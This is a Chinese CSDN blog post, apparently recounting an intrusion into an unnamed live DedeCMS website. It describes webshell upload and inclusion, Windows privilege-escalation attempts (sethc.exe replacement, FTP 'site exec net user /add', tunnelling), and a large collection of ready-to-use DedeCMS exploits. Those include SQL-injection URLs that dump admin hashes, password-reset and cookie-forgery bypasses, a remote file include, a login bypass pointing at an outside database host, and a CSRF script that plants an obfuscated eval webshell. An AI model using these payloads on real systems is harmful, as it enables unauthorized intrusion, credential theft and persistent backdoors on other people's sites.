一次实战记录

最新推荐文章于 2021-11-11 11:45:51 发布
最新推荐文章于 2021-11-11 11:45:51 发布
阅读量2.0k 收藏 3
点赞数
分类专栏: 渗透笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_40709439/article/details/88357198
版权

前几天遇到了个挺坑的网站

是dedecms,一发现是它,我第一时间利用/data/admin/ver.txt
得到更新年份20170504 查看官网的历史版本信息,发现是dedecms v7.5 sp2 版本

记得这个版本存在前台search.php文件的注入漏洞、前台任意用户密码重置漏洞、前台cookie伪造登陆到管理员前台账号,再利用前台管理员用户重置后台管理员的密码。从而进入后台进行getshell 后台getshell比较简单就不说了。

ps:有时候后台默认文件被修改,可以利用各种标识文件 tags.phpuploadsafe.inc.php进行后台目录的爆破(仅针对win系统)。
exp与原理分析可以看:https://www.cnblogs.com/zhaijiahui/p/8484667.html

当前这些的前提前台开启了注册功能,从v6.5开始就没有默认开启这个功能了,可以在后台开启。

回到正题,很遗憾,我测试的这个网站没有开启注册功能,这样没有前台用户的话,基本百分之九十八的洞基本无法实现。

暂时只能从注入入手,尝试了多处注入点,没有注入成功。
找下敏感文件了,/data/mysql_error_trace.inc,数据库错误日志文件。

在这个文件中很幸运得到一个前台账户密码。

然后登录会员中心
尝试任意文件上传漏洞
无法绕过上传木马文件
只是在个人中心页面更新logo页面上传了图片马

尝试前台cookie伪造漏洞
因为不为1的整数,所以无法cookie伪造为admin

尝试任意用户密码重置漏洞
利用/member/resetpassword.php文件得到key,这是临时的密码
然后利用临时密码重置admin管理员的密码。可惜前台登录admin报错,
并且爆破后台无果。

只能跳转思路,利用之前上传成功的图片马。利用plus/carbuyaction.php本地文件包含漏洞进行包含图片马的一句话。

成功利用getshell。

提权

权限很低,无法执行命令,连dir都无法回显。

利用mysql提权,找到数据库账号密码,连接进行udf提权,无果
无法调用cmd命令很多exp提权都不能使用。

扫端口,开了3389 21 135 14147

第一尝试 135端口 cpr服务漏洞,利用msf添加路由,直接use exp 然后run 无果

第二尝试 3389 的shift多年前的输入法,crrl+shift快速切换提权。

第三尝试 21与14147 21是ftp服务 14147是FileZillaServer服务
,在webshell找到 FileZillaServer 目录文件,得到其中的密码配置文件。得到FileZillaServer管理员账号密码。

第一,利用lcx.exe进行端来转发,把14147端口转发出来(因为本次环境不能执行命令,于是不能如此转发出来,利用reGeorg+proxifier代理出来)

参考链接 https://blog.csdn.net/he_and/article/details/81260806

本机运行 reGeorgSocksProxy.py -p 端口 -u http://192.168.200.141/haipeng/r/tunnel.nosocket.php

靶机运行 http://192.168.200.141/haipeng/r/tunnel.nosocket.php

再利用Proxy全局代理工具把从靶机所有的流量转到本机开启的端口,这样我们就通过本机这个端口代理了靶机。

代理后本机下载FileZillaServer工具,添加共享目录,添加新用户。

再利用ftp工具连接账号

接下来就是利用ftp提权了。

替换掉system32和\system32\dllcache\目录下的sethc.exe 替换覆盖为cmd.exe(重命名后的) 在远程登录页面按5下shift调出cmd命令框。
我没有成功
.

.

.

待续

连接ftp,使用quote命令提权

quote site exec net user 用户名 密码 /add 添加一个用户

quote site exec net localhost administrators 用户名 /add 把用户添加到系统管理员组

quote site exec tskill PID 在 Windows 2003 中通过 PID 关闭进程

quote site exec tskill notepad 在 Windows 2003 中通过名称关闭同类的进程

quote site exec net stop iisadmin 停止 iis 服务

quote site exec net start iisadmin 启动 iis 服务

也无果

提权姿势参考 https://www.cnblogs.com/dggsec/p/10126382.html

//-------------------------------------------------------------------------------
//--------------------------------------------------------------------------------

总结整理下dedecms一些高危漏洞。

离别歌的一篇文章。搬过来收藏下

dedecms plus/search.php 注入

步骤1:得到反馈
提交

/plus/search.php?keyword=as&typeArr[ uNion ]=a 和 http://www.newflash.tv/plus/search.php?keyword=as&typeArr[ uNion ]=a

我们得到如下反馈:

图片1

反馈为1时利用如下exp:

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a

得到列如下图错误(错误信息中存在被注入出的账号密码)

图片二

反馈为2时利用如下exp:

/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a

爆出了账号密码

图片三

步骤2:破解密码

dede的后台密码加密算法大家可以下了整站看,这里直说解法:将得到的20位密文去掉开头三位,去掉末尾一位,即为16位md5密码。

如拿到的0038c7ad73902a9f1d87去首三末一为8c7ad73902a9f1d8,破解出的密码是15858272308。

步骤3:查找后台地址

dede的后台目录可能改成任何名字,而且不需要插入数据库,也就是说通过注入漏洞是无法爆出后台地址的。不过网上有个简单的方法,访问 /data/mysql_error_trace.inc 里面或许能得到后台的相关信息。

如果这个方法失败,还可以通过google搜索的方法:构造site:bianminxueche.com intitle:后台 等关键字搜索,也许能得到后台地址。

其他方法还有社工、暴力搜索等。

dedecms5.6 member/buy_action.php注入

完整payload:

当前数据库信息

/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select database()),(select 1),'4

查出表名

/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select table_name from information_schema.tables where table_schema=database() LIMIT 7,1),(select 1),'4

查出列名

http://192.168.1.130/member/buy_action.php?product=1',1,2,3,4,5,@`'`),((select column_name from information_schema.columns where table_name=0x646564655f61646d696e LIMIT 6,1),(select 1),'4

dedecms member/reg_new.php SQL注入漏洞

poc:

/member/reg_new.php?dopost=regbase&step=1&mtype=%B8%F6%C8%CB&mtype=%B8%F6%C8%CB&userid=123asd123&uname=12asd13123&userpwd=123123&userpwdok=123123&email=1213asd123%40QQ.COM&safequestion=1','1111111111111','1389701121','127.0.0.1','1389701121','127.0.0.1'),('个人',user(),'4297f44b13955235245b2497399d7a93','12as11111111111111111d13123','','10','0','1213asd11111111111123@QQ.COM','100', '0','-10','','1&safeanswer=1111111111111&sex=&vdcode=slum&agree=

 //把vdcode=slum改成当前的验证码

DedeCMS 5.7_sp1 /member/buy_action.php SQL注入漏洞

访问buy_action.php文件,使用如下参数:

?product=card&pid=1&a=1%26cfg_dbprefix=dede_member_operation WHERE 1=@'/!12345union/ select 1,2,3,4,5,6,7,8,9,10 FROM (SELECT COUNT(),CONCAT( (SELECT pwd FROM dede_member LIMIT 0,1),FLOOR(RAND(0)2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a %23
(如果不行可以试试post)

其中product和pid参数是为了让我们进入mchStrCode对传入数据进行编码的分支,a是为了配合上面提到的差异特性而随意添加的参数。从cfg_dbprefix开始,便是真正的SQL注入攻击代码。 访问该URL后,在页面源码中找到pd_encode和pd_verify字段的值,由于用户Cookie和User-Agent不同,所获取的值也不同,我这里获取的值非别为

列如
pd_encode:FkBdXBdXFw4AWEtVFkVQVwUEQFMPCURXBVQ8XVtBWkAI AldWXT1ZBl4BXEtuX0VcQVlBD11cGDV8JmEmGQgMcFVlFFgVSRgTCV YWV1BeXh8WE0tQCldRTEIFTwFPChUFHAAVBRQCSgoeAU4FUxMla3Z8 dnRwJWYSey1hLWdLExAdc3p3cHlhThIaayd4JnA3GUlGVBVYXd4RlZ rDlYOW1xnQXtfGp4J2Z7dyxrMHArfHRwHnZxcmp0JWZ3aj1nJmcwGX WUIXRWMraWp0Y2ZwdwUBUgZQDVRRUlJSAF8IBAQBAQhWVAMKDgBSUg 0AARN9VlxQM0FXSitwXgFFfVxVVWBKVkp8Im1tWwl5BwZeD1wGCANa AgJUCFYHVRUnXF1UfFpeWlZhD19XBVMHWgBbCA0GAAwfd11RA35dXw taN1 oOXGZuU150Vw0IA1ELW1cDAQBaWg0CAwUBVg;

pd_verify:1c7ba5d2861959347d0c427684a6ad30。

以这两个字段作为参数访问buy_action.php,URL为:

http://xxx//dedecms5.7_sp1_utf8/member/buy_action.php?pd_encode=FkBdXBdXFw4AWEtVFkVQVwUEQFMPCURXBVQ8XVtBQlBfWkAIAldWXT1ZBl4BXEtuX0VcQVlBD11cGDV8JmEmGQgMcFVlFFgVSRgTCVAHVwYWV1BeXh8WE0tQCldRTEIFTwFPChUFHAAVBRQCSgoeAU4FUxMla3Z8EB1qdnRwJWYSey1hLWdLExAdc3p3cHlhThIaayd4JnA3GUlGVBVYXd4RlZXXAdrDlYOW1xDEHlwfnFhRgIeCUsYJX8sdmsZYnR3dxAFTxgAEUtMQ3UxdnQReXtfGp4J2Z7dyxrMHArfHRwHnZxcmp0JWZ3aj1nJmcwGX5jf2BpE3psRkobWUIXRWMraWp0Y2ZwdwUBUgZQDVRRUlJSAF8IBAQBAQhWVAMKDgBSUgYBXw0AARN9VlxQM0FXSitwXgFFfVxVVWBKVkp8Im1tWwl5BwZeD1wGCANaUQAGAgJUCFYHVRUnXF1UfFpeWlZhD19XBVMHWgBbCA0GAAwfd11RA35dXwtaN1oOXGZuU150Vw0IA1ELW1cDAQBaWg0CAwUBVg&pd_verify=1c7ba5d2861959347d0c427684a6ad30

DedeCMS 5.7 plus/guestbook.php 注入漏洞

  1. http://localhost/dedecms5.7/plus/guestbook.php
  2. [回复/编辑]上可以看到访问者留言的ID。则记下ID,例如: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&id=1
  3. 访问: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&msg=errs.cc’&id=1
  4. 提交后,如果是dede5.7版本的话,会出现"成功更改或回复一条留言",那就证明修改成功了
  5. 再返回到: http://localhost/dedecms5.7/plus/guestbook.php,看下改的那条留言内容是否变为了 errs.cc’ 如果是的话,那就证明此漏洞无法再利用应为他开启: php magic_quotes_gpc=off
  6. 如果没有修改成功,那留言ID的内容还是以前的,那就证明漏洞可以利用。
  7. 那么再次访问: http://localhost/dedecms5.7/plus/guestbook.php?action=admin&job=editok&id=1&msg=’,msg=user(),email=’
  8. 然后返回,那条留言ID的内容就直接修改成了mysql 的user().

poc:

/plus/guestbook.php?action=admin&job=editok&id=146&msg=',msg=@`'`,msg=(selecT CONCAT(userid,0x7c,pwd) fRom `%23@__admin` LIMIT 0,1),email='

Dedecms /member/mtypes.php 注入漏洞

  1. 首先打开: http://127.0.0.1/dedecms5.5/member/mtypes.php
  2. 添加一个分类,记住ID(1),和原来的分类名称(fenlei)
  3. 然后打开: http://127.0.0.1/dedecms5.5/member/mtypes.php?dopost=save&mtypename[1’ or @' AND 1%3D1 and (select ‘r’)%3D’r’ and ‘1’%3D’1]=4
    //将其中的1改成你的分类ID
  4. 结束之后打开之后返回: http://127.0.0.1/dedecms5.5/member/mtypes.php
    //如果(select ‘r’)='r’的话 那么分类名称就被改成了4! 这样我们就能来判断是否满足条件了,二值判断注入

DedeCms flink.php注入漏洞

访问 plus/flink.php

查版本

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select version())),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\

查密码

Submit=%20%E6%8F%90%20%E4%BA%A4%20&dopost=save&email=&logo=,if(@`'`,0x7c,(select concat(userid,0x7c,pwd) from dede_admin limit 0,1)),1,1,1,1,1)#,@`'`&typeid=1&url=http%3A%2F%2F&validate=spen&_FILES[webname][name]=1.gif&_FILES[webname][type]=image/gifx&_FILES[webname][size]=10&&_FILES[webname][tmp_name]=pass\

dedecms5.7 sp1版本存在远程文件包含漏洞

1.访问/install/index.php(index.php.bak),查看文件是否存在。

2.构造payload再次访问,此时清空config_update.php文件。

install/index.php?step=11&s_lang=evi1code&insLockfile=evi1code&install_demo_name=../data/admin/config_update.php

3.可以看到文件已经被清空,这时我们就可以利用变量覆盖来远程包含我们的文件了。

/install/index.php?step=11&s_lang=evi1code&insLockfile=evi1code&install_demo_name=../shell.php&updateHost=http://127.0.0.1/

dedecms v5.6 plus/carbuyaction.php本地包含漏洞

Include/payment/yeepay.php
1.配合文件上传进行本地包含,上传图片马
2.利用cookie修改工具,加上 code=alipay

然后访问

 plus/carbuyaction.php?dopost=return&code=../../uploads/userup/2/12Ka5357-c53.jpg

dedecms v5.7 sp2 前台COOKIE伪造 登录绕过漏洞

利用注册一个用户名与管理员用户的mid一样的整数。如管理员的mid为1,我们注册一个用户名0001的用户

访问访问/member/index.php?uid=0001,获取last_vid__ckMd5的值

接下来使用0001账号登录,登录后修改的cookie。
将last_vid的值赋给DedeUserID,last_vidckMd5的值赋给DedeUserIDckMd5
刷新即可登录到admin管理员的前台用户。

再利用前台密码修改重置后台管理员密码
登录前台管理员账号,进入管理空间,修改新密码即可

当然还有可以

dedecms v5.7 sp2 前台重置管理员前台密码

第一步:访问链接:

http://xxxx/dedecms/dedecms-v57-utf8-sp2-full/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanwser=&id=1

http://xxxx/dedecms/dedecms-v57-utf8-sp2-full/member/resetpassword.php?i=0.0&dopost=safequestion&safequestion=0.0&safeanswer=&id=1

http://xxxx/DedeCMS-V5.7-UTF8-SP2/member/resetpassword.php?dopost=safequestion&safequestion=0e1&safeanwser=&id=1


URL:http://xxxx/DedeCMS-V5.7-UTF8-SP2/member/resetpassword.php
POST:dopost=safequestion&safequestion=0.0&safeanswer=&id=用户ID

id为管理员id,得到key的值,当无法重置管理原密码可以试试post方式

第二步:再访问:

http://xxxx/dedecms/dedecms-v57-utf8-sp2-full/member/resetpassword.php?dopost=getpasswd&id=1&key=gnUckBp3

dedeCMS V5.7 SP2前台文件上传漏洞#

登录到前台会员中心
进入内容中心,在文章发表处可以发表文章,在下面的编辑器可以上传图片
抓包修改1.jpg为1.jpg.p*hp
上传成功返回上传路径

dedecms最新友情链接getshell漏洞

先上exp:
新建exp.php文件内容如下:

<?php
//print_r($_SERVER);
$referer = $_SERVER['HTTP_REFERER'];
$dede_login = str_replace("friendlink_main.php","",$referer);//去掉friendlink_main.php,取得dede后台的路径
//拼接 exp
$muma = '<'.'?'.'@'.'e'.'v'.'a'.'l'.'('.'$'.'_'.'P'.'O'.'S'.'T'.'['.'\''.'c'.'\''.']'.')'.';'.'?'.'>';
$exp = 'tpl.php?action=savetagfile&actiondo=addnewtag&content='. $muma .'&filename=shell.lib.php';
$url = $dede_login.$exp;
//echo $url;
header("location: ".$url);
// send mail coder
exit();
?>

这里利用csrf漏洞使管理员点击我们构造的链接,然后以管理员的权限写了一个shell.lib.php的一句话文件

然后我们在前台的友情链接处添加友情链接。管理原点击,触发漏洞

织梦(DedeCms) v5.6-5.7 越权访问漏洞(直接进入后台)

http://www.ssvdb.com/织梦网站后台/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root

把上面validate=dcug改为当前的验证码,即可直接进入网站后台

此漏洞的前提是必须得到后台路径才能实现

记录:
织梦(dedecms)全版本注入工具
链接:https://pan.baidu.com/s/10vI3yRu35ZNGdKtmgs4DCA 密码:0yv0

https://www.secpulse.com/archives/22816.html
common.inc.php 注入
https://www.leavesongs.com/PENETRATION/UseOfDede0day.html
plus/search.php 注入
织梦dedecms留言板注入漏洞edit.inc.php

莫者
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2)
午夜安全
11-17 3645
《WEB安全渗透测试》(18)DedecmsV5.7越权漏洞+前台重置管理员密码漏洞复现(2) 接着上一篇,我们已经获取到一个webshell,这篇文章是后续提权及漏洞利用。(1)systeminfo生成文件systeminfo >dedecms.txt(2)更新windows-exploit-suggester下载windows-exploit-suggester.py后,先安装xlrd,之后才可以更新。...
Data-Admin-开源
07-13
Data-Admin 旨在为数据库管理提供基于 PHP 的接口。 这不仅限于一两个数据库。 并且底层类库封装了原生PHP数据库调用,让程序员可以使用一套fu
日常运维【4】
weixin_42604768的博客
12-08 649
rsync工具介绍 rsync常用选项 rsync通过ssh同步 rsync通过服务同步【上】 rsync通过服务同步【下】 linux系统日志 screen工具 一,rsync工具介绍(数据备份) rsync命令是一个远程数据同步工具,可通过LAN/WAN快速同步多台主机间的文件。rsync使用所谓的“rsync算法”来使本地和远程两个主机之间的文件达到同步,这个算法只传送两个文件...
后浪推前浪的新开始
av1231234的博客
08-02 291
转载于:https://www.cnblogs.com/Gandy/p/7275296.html
www.wljx.net/forum.php,齐博CMS:主页被黑,不知漏洞在哪?
weixin_31281003的博客
03-10 26万+
用的是PHP168 5.0和PHPWind Forums v6.3.2的高深度整合版本,今天早上发现主页被换了!好在能进后台,能ftp,换回自己的主页,仔细检查,在“cache”文件夹多了一个yf.php文件,里面代码如下,请帮忙看看:$admin['pass']= "51496419";//设置密码$notice = "目录:";//设置版权$myneme = "Hack.Mr.Ji...
一次实战记录-附件资源
03-05
一次实战记录-附件资源
一次OOM问题排查过程实战记录
01-05
上周运维反馈线上程序出现了OOM,程序日志中的输出为 ...看线程名称应该是tomcat的nio工作线程,线程在处理程序的时候因为无法在堆中分配更多内存出现了OOM,幸好JVM启动参数配置了-XX:+HeapDumpOnOutOfMemoryE
一次简单的Oracle恢复Case实战记录
12-16
在本案例中,我们面临的是一个Oracle数据库由于硬件故障(坏盘)和存储系统断电导致的严重问题,使得数据库无法正常打开。从错误日志分析,我们可以看到一系列的内部错误代码,这些错误通常与数据恢复、重做日志处理...
(织梦cms)dedecms5.7注入和上传0day
Yatere的天平秤
04-29 1万+
漏洞类型:注入漏洞、上传漏洞 漏洞描述:百度搜索关键字“Powered by DedeCMSV57_GBK 2004-2011 DesDev Inc”,获得使用DeDeCMS系统的网站。   注入漏洞。首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,然后访问“/member/ajax_membergroup.php?action=post&membergro
[php审计]Dedecms审计
anwen12的博客
10-02 402
前言: 很明显这是一篇翻译文章’ 原文:https://srcincite.io/blog/2021/09/30/chasing-a-dream-pwning-the-biggest-cms-in-china.html 0x01 输入是怎么被处理的 function _RunMagicQuotes(&$svar) { if (!@get_magic_quotes_gpc()) { if (is_array($svar)) { foreach ($sva
Nginx+keepalived 实现高可用 防盗链 动静分离
weixin_41882200的博客
03-10 377
一、Nginx Rewrite 规则 Nginx rewrite规则 Rewrite规则含义就是某个URL重写成特定的URL(类似于Redirect),从某种意义上说为了美观或者对搜索引擎友好,提高收录量及排名等。 语法: rewrite [flag]关键字 || 正则 || 替代内容 || flag标记 Rewrite规则的flag标记主要有以下几种: last :相当于Apache里的(L)标记,表示完成rewrite; break:本条规则匹配完成后,终止匹配,不再匹配后面的规则 redir
链接: https://pan.baidu.com/s/1-DgIQmPNwGydAYYwA_fT5w 提取码: pq9q 复制这段内容后打开百度网盘手机App,操作更方便哦
热门推荐
qq_45422535的博客
07-29 230万+
链接: https://pan.baidu.com/s/1-DgIQmPNwGydAYYwA_fT5w 提取码: pq9q 复制这段内容后打开百度网盘手机App,操作更方便哦@TOC 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Markdown编辑器, 可以仔细阅读这篇文章,了解一下Markdown的基本语法知识。 新的改变...
解析http://www.baidu.com/link?url=
Meditation_Crazy
03-26 2万+
前言 在网上搜索,有说url后面的参数是百度收录后生成的参数。 解析方式:https://blog.csdn.net/weixin_30883777/article/details/94793401 模拟请求,得到真正的地址 php方式 https://www.cnblogs.com/xcsn/p/4678304.html <?php $url = "http://www.baidu...
2021-05-20
chendd123123的博客
05-20 134
1、页面导入样式时,使用link和@import有什么区别 1.link是HTML标签,@import是css提供的。 2.link引入的样式页面加载时同时加载,@import引入的样式需等页面加载完成后再加载。 3.link没有兼容性问题,@import不兼容ie5以下。 4.link可以通过js操作DOM动态引入样式表改变样式,而@import不可以。 2、将下划线改成驼峰命名 var str = 'a_cb'; str = str.replace(/(\w)(_)(\w)/g, function(wo
AV1代码学习:encoder_encode函数
BigDream123的博客
11-04 2230
从aom_codec_encode函数进入encoder_encode函数。 该函数的主要流程如下: 检查当前帧,计算编码数据尺寸ctx->cx_data_sz(编码数据保存在ctx->cx_data) 根据之前解析的配置设置编码信息(av1_change_config函数),在编码时,可以通过访问ctx->cpi的AV1_COMP结构体,访问到许多具体编码信息。 应用编码标志(av1_apply_encoding_flags)(这部分没有明白什么含义) 对一系列结构体和buff
MYSQL-mysqlslap
weixin_34008805的博客
12-15 210
简介:mysqlslapis a diagnostic program designed to emulate client load for a MySQL server and to report the timing of each stage. It works as if multiple clients are accessing the server.mys...
http://caomaoav.top/index.php,hkfeed-dev/2014-11-04-passwords.txt at master · threatbot/hkfeed-dev ·...
weixin_30838971的博客
03-11 12万+
~!@#$%^&~!@#$%^&*()_-!@#$%^!@#$%^&@#$%^&@#$%&000000000000000000000001xiaoqiang0061qiqi00852880.1230.1234012345012345601234567012345678901280128014703210557wuchenli06102012072752712...
FFmpeg 3.0 计算视频时长
一世豁然的专栏
02-16 3660
本博客转载于:http://www.jianshu.com/p/66b13b2b2979 1、问题:AVFormatContext和AVStream都有duration: int64_t字段,调用av_dump_format()打印的多媒体文件时长是怎么算出来的呢? 2、av_dump_format输出示例 Metadata: major_brand
JS点击事件的赋值
HHHHzhc的博客
11-11 2064
最近在写网页的时候,为了缩减代码的重复,提高代码的利用率,我把经常用的代码封装成一个方法,后面需要用的时候直接调用。 但是我在js的点击事件上遇到了这样一个问题:点击事件onclick调用函数的时候,并未给点击事件赋值,而是自己执行了函数。 我的代码如下: 以上代码执行后,点击了没有反应,并且控制台会输出123123 通过浏览器F12断点一步一步查询后发现: 点击事件如果赋值的函数是需要传参数的,则不会给点击事件赋值函数对象,而是函数自己本身会自动执行(故控制台会有123123),...
一次MySQL Slave库恢复实战记录
最新发布
05-14
下面是一次MySQL Slave库恢复的实战记录,供参考: 1. 确认从库数据丢失或异常情况 在主从复制的环境下,当从库出现异常或数据丢失时,需要先确认是从库数据丢失还是复制链路中出现问题。 可以通过以下方式进行...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值